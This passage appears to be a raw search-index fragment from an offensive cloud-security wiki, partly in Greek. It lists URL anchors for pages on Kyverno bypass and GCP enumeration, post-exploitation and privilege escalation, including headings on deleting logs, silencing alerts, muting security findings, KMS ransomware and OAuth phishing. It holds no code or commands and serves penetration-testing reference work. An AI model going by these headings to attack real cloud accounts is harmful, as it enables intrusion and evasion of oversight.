tes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#enumerate-excluded","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#example","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#Κατάχρηση-του-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#kubernetes-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#Ορισμός","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#Σκοπός","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#enumeration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#Κατάχρηση-του-kyverno-και-του-gatekeeper-vwc","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#Χρήση-Περίπτωσης","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#Αναφορές","pentesting-cloud/gcp-security/index.html#gcp-pentesting","pentesting-cloud/gcp-security/index.html#basic-information","pentesting-cloud/gcp-security/index.html#labs-to-learn","pentesting-cloud/gcp-security/index.html#gcp-pentesterred-team-methodology","pentesting-cloud/gcp-security/index.html#basic-enumeration","pentesting-cloud/gcp-security/index.html#ssrf","pentesting-cloud/gcp-security/index.html#whoami","pentesting-cloud/gcp-security/index.html#Οργάνωση-Αρίθμηση","pentesting-cloud/gcp-security/index.html#principals--iam-enumeration","pentesting-cloud/gcp-security/index.html#services-enumeration","pentesting-cloud/gcp-security/index.html#privilege-escalation-post-exploitation--persistence","pentesting-cloud/gcp-security/index.html#publicly-exposed-services","pentesting-cloud/gcp-security/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/index.html#automatic-tools","pentesting-cloud/gcp-security/index.html#gcloud-config--debug","pentesting-cloud/gcp-security/index.html#capture-gcloud-gsutil-network","pentesting-cloud/gcp-security/index.html#oauth-token-configure-in-gcloud","pentesting-cloud/gcp-security/index.html#Αναφορές","pentesting-cloud/gcp-security/gcp-basic-information/index.html#gcp---Βασικές-Πληροφορίες","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Ιεραρχία-Πόρων","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Μεταφορά-Έργων","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Πολιτικές-Οργάνωσης","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Προεπιλεγμένες-Πολιτικές-Οργάνωσης","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Ρόλοι-iam","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Χρήστες","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Ομάδες","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Προεπιλεγμένη-Πολιτική-Κωδικών-Πρόσβασης","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Λογαριασμοί-Υπηρεσιών","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Κλειδιά--tokens","pentesting-cloud/gcp-security/gcp-basic-information/index.html#access-scopes","pentesting-cloud/gcp-security/gcp-basic-information/index.html#terraform-iam-Πολιτικές-Δεσμεύσεις-και-Μέλη","pentesting-cloud/gcp-security/gcp-basic-information/index.html#Αναφορές","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp---Κατάχρηση-Ομοσπονδίας","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#oidc---Κατάχρηση-github-actions","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#gcp","pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.html#github","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#gcp---permissions-for-a-pentest","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#individual-tools-permissions","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#purplepanda","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#scoutsuite","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cloudsploit","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#Χαρτογράφηση","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#starbase","pentesting-cloud/gcp-security/gcp-post-exploitation/index.html#gcp---Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#gcp---app-engine-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#app-engine","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#appenginememcacheaddkey--appenginememcachelist--appenginememcachegetkey--appenginememcacheflush","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#loggingviewsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#Διαβάστε-τον-Πηγαίο-Κώδικα","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#Τροποποιήστε-τον-Πηγαίο-Κώδικα","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#gcp---artifact-registry-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#artifact-registry","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#privesc","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#gcp---cloud-build-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloud-build","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloudbuildbuildsapprove","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#gcp---cloud-functions-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloudfunctionsfunctionssourcecodeget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#Κλοπή-Αιτημάτων-cloud-function","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#gcp---cloud-run-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#cloud-run","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#Πρόσβαση-στις-εικόνες","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#Τροποποίηση--επαναφορά-της-εικόνας","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#gcp---cloud-shell-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#cloud-shell","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#container-escape","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#Χρησιμοποιήστε-το-ως-proxy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#gcp---cloud-sql-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloud-sql","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesupdate--cloudsqlinstancesget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlusersupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesrestorebackup-cloudsqlbackuprunsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlbackuprunsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesexport-storageobjectscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesimport-storageobjectsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqldatabasesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#gcp---compute-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#compute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Εξαγωγή--Επιθεώρηση-Εικόνων-τοπικά","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Εξαγωγή--Επιθεώρηση-Στιγμιότυπων--Δίσκων-τοπικά","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Επιθεώρηση-μιας-Εικόνας-δημιουργώντας-μια-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#Επιθεώρηση-ενός-snapshotΔίσκου-συνδέοντάς-το-σε-μια-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#gcp---filestore-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#mount-filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#Αφαίρεση-Περιορισμών-και-απόκτηση-επιπλέον-δικαιωμάτων","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#Επαναφορά-αντιγράφου-ασφαλείας","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#Δημιουργία-αντιγράφου-ασφαλείας-και-αποκατάσταση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#gcp---iam-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#iam","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#Παροχή-πρόσβασης-στην-κονσόλα-διαχείρισης","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#gcp---kms-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsdestroy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoencrypt--cloudkmscryptokeyversionsusetoencryptviadelegation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetosign","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoverify","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#gcp---logging-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#basic-information","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#default-logging","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#add-excepted-principal","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#read-logs---logginglogentrieslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#Γράψτε-αρχεία-καταγραφής---logginglogentriescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#gcp---Παρακολούθηση-Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#Παρακολούθηση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#gcp---pubsub-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsub","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicspublish","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdetachsubscription","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionscreate-pubsubtopicsattachsubscription--pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasattach-pubsubtopicsupdatepubsubschemascreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemassetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsnapshotscreate-pubsubsnapshotsseek","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#gcp---secretmanager-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanager","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#gcp---Ασφάλεια-Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#Ασφάλεια","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsbulkmuteupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingssetmute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#gcp---Ροές-Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#Ροή-Εργασίας","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#gcp---Αποθήκευση-Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#cloud-storage","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#Δώστε-Δημόσια-Πρόσβαση","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#gcp---privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#introduction-to-gcp-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#permissions-for-privilege-escalation-methodology","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#bypassing-access-scopes","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Τεχνικές-Κλιμάκωσης-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Εκμετάλλευση-gcp-για-τοπική-κλιμάκωση-δικαιωμάτων","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#gcp---apikeys-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#brute-force-api-key-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysgetkeystring--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysundelete--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#Δημιουργία-Εσωτερικής-Εφαρμογής-oauth-για-phishing-άλλων-εργαζομένων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#gcp---appengine-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsget-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineoperationslist-appengineservicesget-appengineserviceslist-appengineversionscreate-appengineversionsget-appengineversionslist-cloudbuildbuildsgetiamserviceaccountsactas-resourcemanagerprojectsget-storageobjectscreate-storageobjectslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#Ενημέρωση-ισοδύναμων-δικαιωμάτων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineinstancesenabledebug-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineservicesget-appengineserviceslist-appengineversionsget-appengineversionslist-computeprojectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsupdate-appengineoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineversionsgetfilecontents-appengineversionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#Πρόσβαση-εγγραφής-στους-κάδους","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#Πρόσβαση-εγγραφής-στο-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#gcp---artifact-registry-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifactregistryrepositoriesuploadartifacts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#gcp---batch-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batch","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batchjobscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#gcp---bigquery-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquery","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#read-table","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#Εξαγωγή-δεδομένων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#Εισαγωγή-δεδομένων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetsupdate-bigquerydatasetsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerytablessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigqueryrowaccesspoliciesupdate-bigqueryrowaccesspoliciessetiampolicy-bigquerytablesgetdata-bigqueryjobscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#gcp---clientauthconfig-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#Δημιουργία-oauth-brand-και-client","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#gcp---cloudbuild-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuild","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadwritetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildconnectionsfetchlinkablerepositories","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#gcp---cloudfunctions-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionscreate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssourcecodeset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssetiampolicy--iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#Πρόσβαση-Ανάγνωσης--Εγγραφής-στον-κάδο","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#Πρόσβαση-Ανάγνωσης--Εγγραφής-στο-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#gcp---cloudidentity-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#cloudidentity","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#Προσθέστε-τον-εαυτό-σας-σε-μια-ομάδα","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#Τροποποίηση-μέλους-ομάδας","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#gcp---cloud-scheduler-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloud-scheduler","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobscreate-iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobsupdate-iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#gcp---compute-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#compute","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeprojectssetcommoninstancemetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetmetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesoslogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesosadminlogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancescreateiamserviceaccountsactas-computediskscreate-computeinstancescreate-computeinstancessetmetadata-computeinstancessetserviceaccount-computesubnetworksuse-computesubnetworksuseexternalip","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#osconfigpatchdeploymentscreate--osconfigpatchjobsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computemachineimagessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computesnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computediskssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#Παράκαμψη-Πεδίων-Πρόσβασης","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#Τοπική-Κλιμάκωση-Δικαιωμάτων-σε-gcp-compute-instance","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---Προσθήκη-Προσαρμοσμένων-ssh-Μεταδεδομένων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---Προσθήκη-Προσαρμοσμένων-ssh-Μεταδεδομένων-1","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#Τροποποίηση-των-μεταδεδομένων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#gcp---composer-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Κατέβασμα-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Εισαγωγή-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Γράψτε-Πρόσβαση-στον-κάδ